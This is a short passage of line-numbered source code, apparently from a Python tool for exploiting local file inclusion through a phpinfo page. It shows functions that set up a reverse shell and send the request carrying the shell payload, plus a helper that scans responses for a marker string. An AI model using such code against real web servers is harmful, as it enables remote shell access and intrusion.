(headers,lfipath,phpinfopath,host)
| 617 | print phpinfo_request(headers,reverseConn,lfipath,phpinfopath,0,host) |
| 618 | |
| 619 | def phpinfo_reverse_shell(headers,lfipath,phpinfopath,host): |
| 620 | generic_reverse_shell() |
| 621 | print phpinfo_request(headers,reverseConn,lfipath,phpinfopath,0,host) |
| 622 | |
| 623 | def phpinfo_ext(content): |
| 624 | indexes = SubstrFind(content, "AbracadabrA") |
no test coverage detected